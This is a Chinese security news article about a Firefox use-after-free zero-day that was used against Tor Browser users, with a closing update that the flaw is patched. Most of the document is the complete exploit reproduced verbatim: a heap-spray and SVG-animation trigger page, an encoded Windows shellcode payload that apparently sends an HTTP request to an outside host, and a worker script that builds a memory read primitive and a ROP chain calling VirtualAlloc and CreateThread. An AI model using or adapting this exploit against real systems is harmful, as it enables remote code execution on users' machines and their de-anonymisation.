【行业资讯】客正在利用Firefox的0day漏洞攻击Tor用户（含Exploit）

根据最新的消息，安全研究专家发现了一个0day漏洞，攻击者或可利用该漏洞在Tor和Firefox浏览器用户的计算机中执行恶意代码。

就在几天前，Tor官网上首次出现了关于一个未知的Firefox漏洞的消息。其中包含有数百行的漏洞利用代码（java script），攻击者可以利用这份代码来攻击Tor浏览器的用户。Tor项目的联合创始人RogerDingledine也证实了该漏洞的真实性，并且表示Mozilla的工程师们正在努力开发针对该漏洞的修复补丁。

安全研究专家在对代码进行了分析之后表示，攻击代码利用了一个内存崩溃漏洞，该漏洞将允许攻击者在运行了Windows操作系统的计算机中执行恶意代码。

想必各位都知道，2013年美国联邦调查局曾经利用了某种技术成功找出了那些利用Tor匿名服务来访问儿童色情网络的用户，而根据一位独立安全研究人员（@TheWack0lian）的分析报告，此次的恶意Payload与2013年FBI所用的Payload几乎是一样的。

TheWack0lian在接受采访时表示："此次的漏洞利用代码与2013年FBI所用的几乎是一样的，它用来执行恶意代码的漏洞也与2013年Tor浏览器中的漏洞几乎相同。其中的大部分代码都是一样的，只有一小部分改变了。"如果同学们对2013年的那次攻击事件感兴趣的话，可以参阅这份报告【点我获取】。

根据另外一位安全研究人员（JoshuaYabut）的分析报告，攻击者利用了一个所谓的用后释放（UAF）漏洞，该漏洞需要使用java script来触发。Yabut表示，攻击者可以通过这段漏洞利用代码攻击Windows系统，漏洞利用代码可以根据目标Firefox浏览器的版本来调整payload的内存位置，而且远程代码执行的成功率为100%。这也就意味着，攻击者在开发这段漏洞利用代码时进行了非常广泛的测试，并以此来确保攻击代码可以在多版本的Firefox浏览器中正常运行。除此之外，漏洞利用代码还会直接调用kernel32.dll（Windows操作系统的核心部分）。

Mozilla的官方发言人表示，公司已经得知了关于该漏洞的详细信息，相关的技术人员正在努力修复该漏洞。考虑到目前这个漏洞的影响范围，再加上漏洞利用代码已被公布出来，受影响的用户数量可能还会继续增加。因此Mozilla也建议用户在可用的更新补丁发布之前，先暂时选择使用其他的浏览器。如果用户仍然想使用Firefox的话，至少应该禁用访问网站的java script脚本。除此之外，用户也应该停止使用Tor。

漏洞利用代码



下面这段JavaScript代码就是攻击者用来攻击Tor浏览器的漏洞利用代码。它由一个HTML页面和CSS文件构成，具体如下所示。虽然代码的具体功能目前尚不清楚，但是它可以直接访问Windows操作系统的kernel32.dll。


HTML：

复制代码

1. <html>
4.   <head>
7.     <script>
9.   var thecode
12. ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002
15. \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
18. +
21. '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\
24. u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190';
27.     var worker = newWorker('cssbanner.js');
30.      worker.postMessage(thecode);
33.       var svgns ='http://www.w3.org/2000/svg';
36.       var heap80 = newArray(0x1000);
39.       var heap100 =new Array(0x4000);
42.       var block80 =new ArrayBuffer(0x80);
45.       var block100 = new ArrayBuffer(0x100);
48.       var sprayBase =undefined;
51.       var arrBase =undefined;
54.       var animateX =undefined;
57.       var containerA =undefined;
60.       var offset =0x90;
63.       if
66. (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent))
69.       {
70.         offset = 0x88;// versions 47.0 or greater
73.       }
76.       var $ =function(id) { return document.getElementById(id); }
79.       var exploit =function()
82.       {
85.         var u32 = newUint32Array(block80)
88.         u32[0x2] =arrBase - offset;
91.         u32[0x8] =arrBase - offset;
94.         u32[0xE] =arrBase - offset;
97.         for(i =heap100.length/2; i < heap100.length; i++)
100.         {
103.           heap100[i] =block100.slice(0)
106.         }
109.         for(i = 0; i< heap80.length/2; i++)
112.         {
115.           heap80[i] =block80.slice(0)
118.         }
121.        animateX.setAttribute('begin', '59s')
124.        animateX.setAttribute('begin', '58s')
127.         for(i =heap80.length/2; i < heap80.length; i++)
130.         {
133.           heap80[i] =block80.slice(0)
137.         }
140.         for(i =heap100.length/2; i < heap100.length; i++)
143.         {
146.           heap100[i] =block100.slice(0)
149.         }
153.        animateX.setAttribute('begin', '10s')
156.        animateX.setAttribute('begin', '9s')
159.        window.dump('PAUSING!!! YAYA');
162.        containerA.pauseAnimations();
165.     }
168.      worker.onmessage = function(e)
171.      {
174.             worker.onmessage = function(e)
177.             {
180.        window.setTimeout(function()
183.           {
186.            worker.terminate();
190.             document.body.innerHTML = '';
193.            document.getElementsByTagName('head')[0].innerHTML = '';
196.            document.body.setAttribute('onload', '')
199.           }, 1000);
202.             }
205.             arrBase = e.data;
208.             exploit();
211.     }
215.     var idGenerator =function()
218.     {
221.       return 'id' +
224. (((1+Math.random())*0x10000)|0).toString(16).substring(1);
227.     }
231.     var craftDOM =function()
234.     {
237.       containerA =document.createElementNS(svgns, 'svg')
240.       var containerB =document.createElementNS(svgns, 'svg');
244.       animateX =document.createElementNS(svgns, 'animate')
247.       var animateA =document.createElementNS(svgns, 'animate')
250.       var animateB =document.createElementNS(svgns, 'animate')
253.       var animateC =document.createElementNS(svgns, 'animate')
256.       var idX =idGenerator();
259.       var idA =idGenerator();
262.       var idB =idGenerator();
265.       var idC =idGenerator();
268.      animateX.setAttribute('id', idX);
271.      animateA.setAttribute('id', idA);
274.      animateA.setAttribute('end', '50s');
277.      animateB.setAttribute('id', idB);
280.      animateB.setAttribute('begin', '60s');
283.      animateB.setAttribute('end', idC + '.end');
286.      animateC.setAttribute('id', idC);
289.      animateC.setAttribute('begin', '10s');
292.      animateC.setAttribute('end', idA + '.end');
296.      containerA.appendChild(animateX)
299.      containerA.appendChild(animateA)
302.      containerA.appendChild(animateB)
306.      containerB.appendChild(animateC)
310.      document.body.appendChild(containerA);
313.      document.body.appendChild(containerB);
316.     }
319.      window.onload =craftDOM;
322.    //
325.     </script>
329.     <style>
332.         #mtdiv{
335.             position:absolute;
338.             width:960px;
341.             height:166px;
344.             z-index:15;
347.             top: 100px;
350.             left: 50%;
353.             margin: 00 0 -480px;
356.         }
359.     </style>
362.   </head>
365.   <bodybgcolor='#2F3236'>
371.       <divid='mtdiv'>
374.           <imgsrc='mt.png'/>
377.       </div>
380.   </body>
383.   <script>
386.        setTimeout('window.location = \'member.php\';', 2000);
389. </script>
395. </html>

cssbanner.js：

复制代码

1. self.onmessage =
4. function(msg) {
10.   thecode = msg.data;
13.   var pack = function(b) { var a = b >> 16; return String.fromCharCode(b
16. & 65535) + String.fromCharCode(a) };
22.   function Memory(b,a,f)
25.   {
28.      this._base_addr=b;
31.       this._read=a;
34.       this._write=f;
37.       this._abs_read =function(a) {
40.           a >=this._base_addr ? a = this._read( a - this._base_addr) : (
43. a = 4294967295 - this._base_addr + 1 + a, a = this._read(a));
46.           return0>a?4294967295+a+1:a
52.       };
55.       this._abs_write= function(a,b) {
58.           a >=this._base_addr ? this._write(a - this._base_addr, b) : ( a
61. = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
64.       };
67.       this.readByte =function(a) {
70.           returnthis.read(a) & 255
76.       };
79.       this.readWord =function(a) {
82.           returnthis.read(a) & 65535
85.       };
88.       this.readDword =function(a){ return this.read(a) };
91.       this.read =function(a,b) {
94.           if (a%4) {
97.               var c =this._abs_read( a & 4294967292),
100.                   d =this._abs_read( a+4 & 4294967292),
103.                   e =a%4;
106.               returnc>>>8*e | d<<8*(4-e)
109.           }
112.           returnthis._abs_read(a)
115.       };
118.       this.readStr =function(a) {
121.           for(var b ="", c = 0;;) {
124.               if (32== c)
127.                  return "";
130.               var d =this.readByte(a+c);
133.               if(0 ==d)
136.                  break;
139.               b +=String.fromCharCode(d);
142.               c++
145.           }
148.           return b
154.       };
157.       this.write =function(a){}
160.   }
163.   function PE(b,a) {
166.       this.mem = b;
169.      this.export_table = this.module_base = void 0;
172.      this.export_table_size = 0;
175.      this.import_table = void 0;
178.      this.import_table_size = 0;
181.      this.find_module_base = function(a) {
184.           for(a &=4294901760; a; ) {
187.               if(23117== this.mem.readWord(a))
190.                  return this.module_base=a;
193.               a -= 65536
196.           }
199.       };
202.      this._resolve_pe_structures = function() {
205.           peFile =this.module_base + this.mem.readWord(this.module_base+60);
208.           if(17744 !=this.mem.readDword(peFile))
211.              throw"Bad NT Signature";
214.           this.pe_file= peFile;
217.          this.optional_header = this.pe_file+36;
220.          this.export_directory =
223. this.module_base+this.mem.readDword(this.pe_file+120);
226.          this.export_directory_size = this.mem.readDword(this.pe_file+124);
229.          this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
232.          this.import_directory_size=this.mem.readDword(this.pe_file+132)};
235.          this.resolve_imported_function=function(a,b){
238.               void0==this.import_directory&&this._resolve_pe_structures();
241.               for(var
244. e=this.import_directory,c=e+this.import_directory_size;e<c;){
247.                   var
250. d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
253.                  if(a.toUpperCase()==d.toUpperCase()){
256.                      for(var c = this.mem.readDword(e) + this.module_base,
259.                              e = this.mem.readDword(e+16) +
262. this.module_base,
265.                              d = this.mem.readDword(c),
268.                              f = 0 ; 0 !=d ;)
271.                      {
274.                          if(this.mem.readStr(d+this.module_base+2).toUpperCase()
277. == b.toUpperCase())
280.                              return this.mem.readDword(e+4*f);
283.                          f++;
286.                          d = this.mem.readDword(c+4*f)
289.                      }
292.                      break
295.                   }
298.                  e+=20
301.               }
304.               return 0
307.           };
310.           void 0!=a&& this.find_module_base(a)
313.       }
316.       functionROP(b,a){
319.          this.mem = b;
322.          this.pe = newPE(b,a);
325.         this.pe._resolve_pe_structures();
328.         this.module_base = this.pe.module_base+4096;
331.         this.findSequence = function(a) {
334.             for(varb=0;;) {
337.                 for(var e=0,c=0;c<a.length;c++)
340.                    if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)
343.                        e++;
346.                    else
349.                        break;
352.                if(e==a.length)
355.                     returnthis.module_base+b;
358.                 b++
364.          }
370.      };
373.     this.findStackPivot=function() {
376.          returnthis.findSequence([148,195])
382.      };
385.     this.findPopRet=function(a) {
388.          returnthis.findSequence([88,195])
394.      };
397.     this.ropChain=function(a,b,e,c) {
400.          c = void 0 !=c ? c : new ArrayBuffer(4096);
403.          c = newUint32Array(c);
406.          var d =this.findStackPivot(),
409.              f =this.findPopRet("EAX"),
412.              g =
415. this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
418.          c[0]= f+1;
421.          c[1]= f;
424.          c[2]=a+b+4*e+4;
427.          c[3]= d;
430.         for(i=0;i<e;i++)
433.             c[(b>>2)+i] = d;
436.          d=(b+4>>2)+e;
439.          c[d++]=g;
442.         c[d++]=a+(b+4*e+28);
445.          c[d++]=a;
448.          c[d++]=4096;
451.          c[d++]=4096;
454.          c[d++]=64;
457.         c[d++]=3435973836;
460.          return c
463.      }
466.   }
469.   var conv=newArrayBuffer(8),
472.       convf64=newFloat64Array(conv),
475.       convu32=newUint32Array(conv),
478.       qword2Double=function(b,a){
481.          convu32[0]=b;
484.          convu32[1]=a;
487.           returnconvf64[0]
490.       },
493.       doubleFromFloat= function(b,a) {
496.          convf64[0]=b;
499.           returnconvu32[a]
501.       },
504.      sprayArrays=function() {
507.           for(varb=Array(262138),a=0;262138>a;a++)
510.              b[a]=fzero;
513.          for(a=0;a<b.length;a+=512)
516.               b[a+1] =memory,
519.               b[a+21]= qword2Double(0,2),
522.               b[a+14]= qword2Double(arrBase+o1,0),
525.               b[a+(o1+8)/8]= qword2Double(arrBase+o2,0),
528.              b[a+(o2+0)/8] = qword2Double(2,0),
531.              b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
534.              b[a+(o3+0)/8] = qword2Double(16,0),
537.              b[a+(o3+24)/8] = qword2Double(2,0),
540.              b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
543.              b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
546.              b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
549.              b[a+(o6+8)/8] = qword2Double(2,0),
552.               b[a+(o7+8)/8]= qword2Double(arrBase+o7+16,0),
555.              b[a+(o7+16)/8] = qword2Double(0,4026531840),
558.              b[a+(o7+32)/8] = qword2Double(0,3220176896),
561.              b[a+(o7+48)/8] = qword2Double(2,0),
564.              b[a+(o7+56)/8] = qword2Double(1,0),
567.              b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
570.              b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
573.              b[a+(o7+168)/8] = qword2Double(0,2),
576.               b[a+(o9+0)/8]= qword2Double(arrBase+o10,2),
579.              b[a+(o10+0)/8] = qword2Double(2,0),
582.              b[a+(o10+8)/8] = qword2Double(0,268435456),
585.              b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
588.              b[a+(o11+16)/8] = qword2Double(0,4026531840),
591.              b[a+(o11+32)/8] = qword2Double(0,3220176896),
594.              b[a+(o11+48)/8] = qword2Double(2,0),
597.              b[a+(o11+56)/8] = qword2Double(1,0),
600.              b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
603.               b[a+(o11+112)/8] =qword2Double(arrBase+o9,arrBase+o9+16),
606.              b[a+(o11+168)/8] = qword2Double(0,2);
609.          for(a=0;a<spr.length;a++)
612.              spr[a]=b.slice(0)
615.       },vtable_offset=300;
618.      /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
621. vtable_offset=304 :
624.      /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)
627. && (vtable_offset=308);
630.       varspr=Array(400),
633.      arrBase=805306416,
636.       ropArrBuf=newArrayBuffer(4096),
639.       o1=176,
642.       o2=256,
645.       o3=768,
648.       o4=832,
651.       o5=864,
654.       o6=928,
657.       o7=1024,
660.       o8=1280,
663.       o9=1344,
666.       o10=1376,
669.       o11=1536,
672.       oRop=1792,
675.       memory=newUint32Array(16),
678.      len=memory.length,
681.       arr_index=0,
684.       arr_offset=0;
687.      fzero=qword2Double(0,0);
690.      0!=thecode.length%2&&(thecode+="\u9090");
693.       sprayArrays();
696.      postMessage(arrBase);
699.      for(memarrayloc=void 0;void 0==memarrayloc;)
702.          for(i=0;i<spr.length;i++)
705.               for(offset=0;offset<spr[i].length;offset+=512)
708.                 if("object" != typeof spr[i][offset+1]) {
711.                     memarrayloc=doubleFromFloat(spr[i][offset+1],0);
714.                     arr_index=i;
717.                     arr_offset=offset;
720.                      spr[i][offset+(o2+0)/8]=qword2Double(65,0);
723.                     spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);
726.                     for(j=0;33>j;j++)
729.                         spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);
732.                     spr[i][offset+(o3+8)/8]=qword2Double(0,0);
735.                     spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);
738.                     spr[i][offset+(o7+168)/8]=qword2Double(0,3);
741.                     spr[i][offset+(o7+88)/8]=qword2Double(0,2);
744.                     break
747.                  }
750.      for(;memory.length==len;);
753.       var mem=newMemory(memarrayloc+48,
756.                         function(b){return memory[b/4]},
759.                          function(b,a){memory[b/4]=a}),
762.          xulPtr=mem.readDword(memarrayloc+12);
765.      spr[arr_index][arr_offset+1]=ropArrBuf;
768.      ropPtr=mem.readDword(arrBase+8);
771.      spr[arr_index][arr_offset+1]=null;
774.      ropBase=mem.readDword(ropPtr+16);
777.       var rop=newROP(mem,xulPtr);
780.      rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
783.       varbackupESP=rop.findSequence([137,1,195]), ropChain=new
786. Uint32Array(ropArrBuf);
789.      ropChain[0]=backupESP;
792.      CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");
795.       for(vari=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
798.      ropChain[i++]=3296825488;
801.      ropChain[i++]=2048;
804.      ropChain[i++]=1347469361;
807.      ropChain[i++]=1528949584;
810.      ropChain[i++]=3092271187;
813.      ropChain[i++]=CreateThread;
816.      ropChain[i++]=3096498431;
819.      ropChain[i++]=arrBase+16;
822.      ropChain[i++]=1955274891;
825.      ropChain[i++]=280697892;
828.      ropChain[i++]=704643071;
831.      ropChain[i++]=2425406428;
834.      ropChain[i++]=4294957800;
837.      ropChain[i++]=2425393407;
840.       for (varj=0;j<thecode.length;j+=2)
843.          ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);
846.      spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
849.       spr[arr_index][arr_offset+3]=qword2Double(0,256);
852.      spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
855.      spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
858.      spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
861.      postMessage("GREAT SUCCESS");
864. };

更新：火狐浏览器的开发商Mozilla和Tor项目组已经修复了相关的底层漏洞。据了解，Windows、Mac OSX和Linux平台的浏览器均受到了该漏洞的影响。


* 参考来源：arstechnica、torproject，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM

技术交流QQ群： 397745473
来自:https://xianzhi.aliyun.com/forum/read/491.html?fpage=4